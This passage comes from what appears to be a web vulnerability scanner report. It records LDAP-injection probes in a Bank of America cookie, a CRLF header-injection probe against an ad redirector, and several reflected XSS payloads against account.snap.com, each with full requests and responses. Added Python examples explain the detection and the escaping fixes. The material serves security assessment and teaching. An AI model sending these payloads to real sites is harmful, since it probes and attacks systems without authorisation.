       <meta name="keywords" content="Privacy, privacy practices, privacy preferences, private, confidentiality, protect, protection, secure, security, opt in, opt out, opt-in, opt-out, safeguard, sharing, secure socket layer, SSL, cookie, cookies, password, passwords, online privacy, email, e-mail, security, identity theft, fraud, privacy policy, privacy and security, privacy &security, overview, privacy policies, online banking, online statements, statements, estatements, e-statements, prevention, detection, resolution, report, ID theft, tips">
       <title>Bank of America | Home | Personal</title>

       
<link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/masthead-ns6.css" type="text/css">
<link rel="stylesheet" href="/www/en_US/global/hs_home/stylesheets/home_win_ns6.css" type="text/css">


       <link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/hs_overview_cc.css" type="text/css">    
       <script language="JavaScript" src="/www/en_US/global/js/masthead.js" type="text/javascript"></script>
       <script language="JavaScript" src="/www/en_US/global/js/mvc-js-utils.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/BofA_keyboard_navigation.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/HM_Loader.js" type="te
...[SNIP]...

2.9. https://www.bankofamerica.com/Control.do [BIGipServerngen-www.80 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.bankofamerica.com
Path:   /Control.do

Issue detail

The BIGipServerngen-www.80 cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the BIGipServerngen-www.80 cookie. The two requests produced different responses, which the scanner reads as a sign that the input may be incorporated unsafely into a conjunctive LDAP query. As with the previous finding, the cookie in question is an F5 BIG-IP load-balancer persistence cookie, and the only difference between the two responses below is the ngen_throttle value and the presence of the hp_beta cookie; both bodies are 8843 bytes. Malformed persistence cookies are ignored by the balancer, which then selects a pool member on its own, so a differing session cookie is expected and is not by itself evidence of an LDAP query. Confirm with a payload that alters the body before rating this High.

Request 1

GET /Control.do?body=selectState&section=onlinebanking_enroll HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=*)(sn=*; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No

Response 1

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:27:13 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: ngen_throttle=429; Expires=Sun, 23 Oct 2011 12:27:12 GMT; Path=/; Domain=.bankofamerica.com
Set-cookie: hp_beta=B; Expires=Sun, 23 Oct 2011 12:27:12 GMT; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Content-Length: 8843













<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description" content="Bank of America works hand-in-hand with you to safeguard your banking experience.">
       <meta name="keywords" content="Privacy, privacy practices, privacy preferences, private, confidentiality, protect, protection, secure, security, opt in, opt out, opt-in, opt-out, safeguard, sharing, secure socket layer, SSL, cookie, cookies, password, passwords, online privacy, email, e-mail, security, identity theft, fraud, privacy policy, privacy and security, privacy &security, overview, privacy policies, online banking, online statements, statements, estatements, e-statements, prevention, detection, resolution, report, ID theft, tips">
       <title>Bank of America | Home | Personal</title>

       
<link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/masthead-ns6.css" type="text/css">
<link rel="stylesheet" href="/www/en_US/global/hs_home/stylesheets/home_win_ns6.css" type="text/css">


       <link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/hs_overview_cc.css" type="text/css">    
       <script language="JavaScript" src="/www/en_US/global/js/masthead.js" type="text/javascript"></script>
       <script language="JavaScript" src="/www/en_US/global/js/mvc-js-utils.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/BofA_keyboard_navigation.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/HM_Loader.js" type="text/javascri
...[SNIP]...

Request 2

GET /Control.do?body=selectState&section=onlinebanking_enroll HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=*)!(sn=*; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No

Response 2

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:27:13 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: ngen_throttle=938083; Expires=Sun, 23 Oct 2011 12:27:12 GMT; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Content-Length: 8843













<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description" content="Bank of America works hand-in-hand with you to safeguard your banking experience.">
       <meta name="keywords" content="Privacy, privacy practices, privacy preferences, private, confidentiality, protect, protection, secure, security, opt in, opt out, opt-in, opt-out, safeguard, sharing, secure socket layer, SSL, cookie, cookies, password, passwords, online privacy, email, e-mail, security, identity theft, fraud, privacy policy, privacy and security, privacy &security, overview, privacy policies, online banking, online statements, statements, estatements, e-statements, prevention, detection, resolution, report, ID theft, tips">
       <title>Bank of America | Home | Personal</title>

       
<link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/masthead-ns6.css" type="text/css">
<link rel="stylesheet" href="/www/en_US/global/hs_home/stylesheets/home_win_ns6.css" type="text/css">


       <link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/hs_overview_cc.css" type="text/css">    
       <script language="JavaScript" src="/www/en_US/global/js/masthead.js" type="text/javascript"></script>
       <script language="JavaScript" src="/www/en_US/global/js/mvc-js-utils.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/BofA_keyboard_navigation.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/HM_Loader.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/js/font_sizes.js" type
...[SNIP]...
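What the paired probes in 2.8 and 2.9 (and in the ci-parameter finding above) are testing for, shown on a toy directory. This is an added example, not Bank of America's code: the directory entries, the filter shapes (|...) and (&...), and the mini filter evaluator are constructed here, and only the probe values come from the report. A real application hands the escaped value to its LDAP library (python-ldap's ldap.filter.escape_filter_chars does the same RFC 4515 escaping) rather than evaluating filters itself.

```python
"""LDAP filter injection: the paired-probe differential and RFC 4515 escaping.
Added example; the directory, filter shapes and evaluator are constructed here."""
import re

# Constructed sample directory: one dict per entry, attribute -> values.
DIRECTORY = [
    {"uid": ["alice"], "sn": ["Anders"], "objectClass": ["person"]},
    {"uid": ["bob"], "sn": ["Brown"], "objectClass": ["person"]},
    {"uid": ["svc-backup"], "objectClass": ["applicationProcess"]},
]


def escape_filter_value(value):
    """Escape a value for use inside a search filter (RFC 4515 section 3):
    backslash, '*', '(', ')' and NUL become \\XX hex escapes."""
    return "".join("\\%02x" % ord(c) if c in "\\*()\x00" else c for c in value)


def _unescape(value):
    return re.sub(r"\\([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), value)


def parse_filter(text, pos=0):
    """Minimal recursive-descent parser for &, |, ! and equality/substring items.
    Raises ValueError on malformed input, where a directory server would return
    a protocol error instead of a result set."""
    if pos >= len(text) or text[pos] != "(":
        raise ValueError("expected '(' at %d" % pos)
    pos += 1
    if pos < len(text) and text[pos] in "&|!":
        op, pos, kids = text[pos], pos + 1, []
        while pos < len(text) and text[pos] == "(":
            node, pos = parse_filter(text, pos)
            kids.append(node)
        if pos >= len(text) or text[pos] != ")" or not kids:
            raise ValueError("malformed compound filter at %d" % pos)
        return (op, kids), pos + 1
    end = text.find(")", pos)
    if end < 0 or "=" not in text[pos:end]:
        raise ValueError("malformed item at %d" % pos)
    attr, val = text[pos:end].split("=", 1)
    return ("=", attr, val), end + 1


def matches(node, entry):
    op = node[0]
    if op == "=":
        _, attr, val = node
        # A raw '*' is the substring wildcard; escaped bytes are matched literally.
        pattern = "^" + ".*".join(re.escape(_unescape(p)) for p in val.split("*")) + "$"
        return any(re.match(pattern, v) for v in entry.get(attr, []))
    kids = node[1]
    if op == "&":
        return all(matches(k, entry) for k in kids)
    if op == "|":
        return any(matches(k, entry) for k in kids)
    return not matches(kids[0], entry)  # "!"


def search(filter_text):
    """Return the sorted uids the filter matches, or 'error' if it does not parse."""
    try:
        node, end = parse_filter(filter_text)
        if end != len(filter_text):
            raise ValueError("trailing data after filter")
    except ValueError:
        return "error"
    return sorted(e["uid"][0] for e in DIRECTORY if matches(node, e))


def vulnerable_filter(user_input):
    """Disjunctive lookup with the input spliced in unescaped."""
    return "(|(uid=%s)(mail=%s))" % (user_input, user_input)


def hardened_filter(user_input):
    """Same lookup, value escaped so it can only ever be a literal."""
    v = escape_filter_value(user_input)
    return "(|(uid=%s)(mail=%s))" % (v, v)


def differential(build, token="4f1f2a3187adb27d"):
    """Run the two probes from this report through a filter builder. Differing
    outcomes are the signal the scanner reports as possible injection."""
    return search(build(token + ")(sn=*")), search(build(token + ")!(sn=*"))


if __name__ == "__main__":
    print("unescaped:", differential(vulnerable_filter))   # (['alice', 'bob'], 'error')
    print("escaped:  ", differential(hardened_filter))     # ([], [])
```

With the unescaped builder the first probe turns the lookup into a match on every entry that has a surname, while the second leaves the filter unparseable; that divergence is exactly what the scanner keys on. With RFC 4515 escaping both probes are plain literals and the two outcomes are identical. Since the responses captured for 2.8 and 2.9 differ only in cookie values, this shows what a true positive would look like rather than confirming those findings.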

3. HTTP header injection

Summary

Severity:   High
Confidence:   Certain
Host:   http://109.xg4ken.com
Path:   /media/redir.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 69ddc%0d%0a94739ce3cc (a URL-encoded CR LF pair between two marker strings) was submitted as the name of an arbitrarily supplied request parameter. The server decoded it and wrote it into the Location header without re-encoding, so the response below carries the injected line break: the second marker, 94739ce3cc, and the trailing =1 each start a header line of their own. Whoever controls the parameter name can therefore append header lines of their choosing to the redirect response.

Request

GET /media/redir.php?prof=56&camp=3086&affcode=kw134&cid=10327990298&networkType=search&url[]=http%3A%2F%2Fservedby.flashtalking.com%2Fclick%2F16008%3B128708%3B94221%3B230%3B3%2F%3Furl%3Dhttp:%2F%2Fresponse.firstdata.com%2F%3FelqPURLPage%3D15&69ddc%0d%0a94739ce3cc=1 HTTP/1.1
Host: 109.xg4ken.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 23:44:08 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=53c1fc86-0f12-0ce9-ea0e-00005cbf77a5; expires=Sun, 24-Jul-2011 23:44:08 GMT; path=/; domain=.xg4ken.com
Location: http://servedby.flashtalking.com/click/16008;128708;94221;230;3/?url=http://response.firstdata.com/?elqPURLPage=15&69ddc
94739ce3cc
=1
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
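Finding 3 is the one finding in this part of the report rated Certain, and the mechanism is simple enough to reproduce offline. The following added example (not xg4ken.com's code) rebuilds a redirect Location value the two ways: from decoded parameter names, which is what redir.php evidently does, and with re-encoding. It also applies the scanner's own check to the captured response text. TARGET is the innermost redirect target from the request, abbreviated; PROBE_QUERY and CAPTURED are constructed from the request and response above.

```python
"""HTTP header injection via a redirector: decoded CR LF reaching Location.
Added example; TARGET, PROBE_QUERY and CAPTURED are constructed from the capture."""
from urllib.parse import parse_qsl, urlencode

TARGET = "http://response.firstdata.com/?elqPURLPage=15"   # redirect target from the request
PROBE_QUERY = "69ddc%0d%0a94739ce3cc=1"                     # the probe parameter, as sent


def location_vulnerable(target, query):
    """Rebuild the redirect URL from *decoded* names and values without re-encoding.
    This is what concatenating PHP's $_GET keys back into a string gives, and it is
    the behaviour the captured response shows."""
    extra = "&".join("%s=%s" % kv for kv in parse_qsl(query, keep_blank_values=True))
    return "%s&%s" % (target, extra) if extra else target


def location_hardened(target, query):
    """Re-encode every name and value; CR and LF leave as %0D%0A and cannot end
    the header line."""
    extra = urlencode(parse_qsl(query, keep_blank_values=True))
    return "%s&%s" % (target, extra) if extra else target


def header_is_clean(value):
    """The check every header-writing API must make: no bare CR or LF in a value."""
    return "\r" not in value and "\n" not in value


def injected_lines(raw_response, token):
    """Scanner-style verification on the wire text: the probe succeeded when the
    part of the token after the CR LF starts a header line of its own."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    return [line for line in head.split("\r\n")[1:] if line.startswith(token)]


# Constructed from the response on this page, headers abbreviated.
CAPTURED = (
    "HTTP/1.1 302 Found\r\n"
    "Server: Apache/2.0.52 (Red Hat)\r\n"
    "Location: " + TARGET + "&69ddc\r\n"
    "94739ce3cc\r\n"
    "=1\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

if __name__ == "__main__":
    print(repr(location_vulnerable(TARGET, PROBE_QUERY)))  # contains '\r\n'
    print(location_hardened(TARGET, PROBE_QUERY))          # ...&69ddc%0D%0A94739ce3cc=1
    print(injected_lines(CAPTURED, "94739ce3cc"))          # ['94739ce3cc']
```

Re-encoding is the fix at the application layer; header_is_clean is the defence in depth that a web framework or server should apply to every header value regardless, since the same decoded-then-concatenated path exists wherever user input is reflected into Set-Cookie or a custom header.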


4. Cross-site scripting (reflected)
There are 70 instances of this issue:


4.1. https://account.snap.com/signup.php [email parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://account.snap.com
Path:   /signup.php

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 574ea"><script>alert(1)</script>46987829a31 was submitted in the email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /signup.php HTTP/1.1
Host: account.snap.com
Connection: keep-alive
Referer: https://account.snap.com/signup.php
Cache-Control: max-age=0
Origin: https://account.snap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303780536; __utma=241625280.1756088163.1303782451.1303782451.1303782451.1; __utmb=241625280; __utmc=241625280; __utmz=241625280.1303782451.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); session=id%3D55022ba0e047fea09f979fd4570d39f9%26time%3D1303782563%26created_time%3D1303782435; PHPSESSID=fc0f88fb7427f8b35b477dc2f19b745b
Content-Length: 15403

terms=Snap+Shots+Terms+of+Use+Policy%0D%0A%0D%0APLEASE+READ+VERY+CAREFULLY+THESE+TERMS+OF+USE+FOR+THE+SNAP+SHOTS+PROGRAM%2C+INCLUDING+THE+SNAP+SHARES+FEATURES%2C+BEFORE+REGISTERING.+PARTICIPATION+IN+T
...[SNIP]...
Agreement+is+intended+to+be+a+beneficiary+of+this+Agreement%2C+and+no+person+not+a+party+to+this+Agreement+shall+have+any+right+to+enforce+any+term+of+this+Agreement.%0D%0A%0D%0A&accept_terms=1&email=574ea"><script>alert(1)</script>46987829a31&url=&password=&re-enter_password=&current_tab=setup

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 02:05:23 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24768

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-t
...[SNIP]...
<input class="text" type="text" name="email" maxlength="50" value="574ea"><script>alert(1)</script>46987829a31" />
...[SNIP]...

4.2. https://account.snap.com/signup.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://account.snap.com
Path:   /signup.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4ae7"%3balert(1)//631b5ca9cf4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f4ae7";alert(1)//631b5ca9cf4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signup.php/f4ae7"%3balert(1)//631b5ca9cf4 HTTP/1.1
Host: account.snap.com
Connection: keep-alive
Referer: http://www.snap.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303780536; __utma=241625280.1756088163.1303782451.1303782451.1303782451.1; __utmb=241625280; __utmc=241625280; __utmz=241625280.1303782451.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); session=id%3D55022ba0e047fea09f979fd4570d39f9%26time%3D1303782563%26created_time%3D1303782435; PHPSESSID=fc0f88fb7427f8b35b477dc2f19b745b

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 02:07:47 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81687

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-t
...[SNIP]...
<script type="text/javascript">
_udn = document.domain;
_uacct = "UA-2209883-1";
if (typeof currentTab == "string") {
urchinTracker("/signup.php/f4ae7";alert(1)//631b5ca9cf4#" + currentTab);
} else {
urchinTracker();
}
</script>
...[SNIP]...

4.3. https://account.snap.com/signup.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://account.snap.com
Path:   /signup.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b702f"><script>alert(1)</script>9caf33b1143 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signup.php/b702f"><script>alert(1)</script>9caf33b1143 HTTP/1.1
Host: account.snap.com
Connection: keep-alive
Referer: http://www.snap.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303780536; __utma=241625280.1756088163.1303782451.1303782451.1303782451.1; __utmb=241625280; __utmc=241625280; __utmz=241625280.1303782451.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); session=id%3D55022ba0e047fea09f979fd4570d39f9%26time%3D1303782563%26created_time%3D1303782435; PHPSESSID=fc0f88fb7427f8b35b477dc2f19b745b

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 02:07:45 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-t
...[SNIP]...
<form id="customize_form" name="customize_form" action="/signup.php/b702f"><script>alert(1)</script>9caf33b1143" enctype="multipart/form-data" method="post">
...[SNIP]...

4.4. https://account.snap.com/signup.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://account.snap.com
Path:   /signup.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2e6c"><script>alert(1)</script>b24b8c87a04849e58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert it to a GET request, which makes the attack easier to demonstrate and to deliver as a link.

Request

GET /signup.php/b2e6c"><script>alert(1)</script>b24b8c87a04849e58?key=81a33c00e5b2572629a04571cb191964&shots_lang=en-us&shots_link_icon=1&shots_preview_ext=1&shots_theme=silver&shots_custom_logo=0&current_tab=customize HTTP/1.1
Host: account.snap.com
Connection: keep-alive
Referer: https://account.snap.com/signup.php
Cache-Control: max-age=0
Origin: https://account.snap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303780536; __utma=241625280.1756088163.1303782451.1303782451.1303782451.1; __utmb=241625280; __utmc=241625280; __utmz=241625280.1303782451.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); session=id%3D55022ba0e047fea09f979fd4570d39f9%26time%3D1303782563%26created_time%3D1303782435; PHPSESSID=fc0f88fb7427f8b35b477dc2f19b745b

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 02:09:12 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81729

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-t
...[SNIP]...
<form id="customize_form" name="customize_form" action="/signup.php/b2e6c"><script>alert(1)</script>b24b8c87a04849e58" enctype="multipart/form-data" method="post">
...[SNIP]...

4.5. https://account.snap.com/signup.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://account.snap.com
Path:   /signup.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81bfc"%3balert(1)//0b224300d3fd4d46a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 81bfc";alert(1)//0b224300d3fd4d46a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert it to a GET request, which makes the attack easier to demonstrate and to deliver as a link.

Request

GET /signup.php/81bfc"%3balert(1)//0b224300d3fd4d46a?key=81a33c00e5b2572629a04571cb191964&shots_lang=en-us&shots_link_icon=1&shots_preview_ext=1&shots_theme=silver&shots_custom_logo=0&current_tab=customize HTTP/1.1
Host: account.snap.com
Connection: keep-alive
Referer: https://account.snap.com/signup.php
Cache-Control: max-age=0
Origin: https://account.snap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303780536; __utma=241625280.1756088163.1303782451.1303782451.1303782451.1; __utmb=241625280; __utmc=241625280; __utmz=241625280.1303782451.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); session=id%3D55022ba0e047fea09f979fd4570d39f9%26time%3D1303782563%26created_time%3D1303782435; PHPSESSID=fc0f88fb7427f8b35b477dc2f19b745b

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 02:09:14 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81699

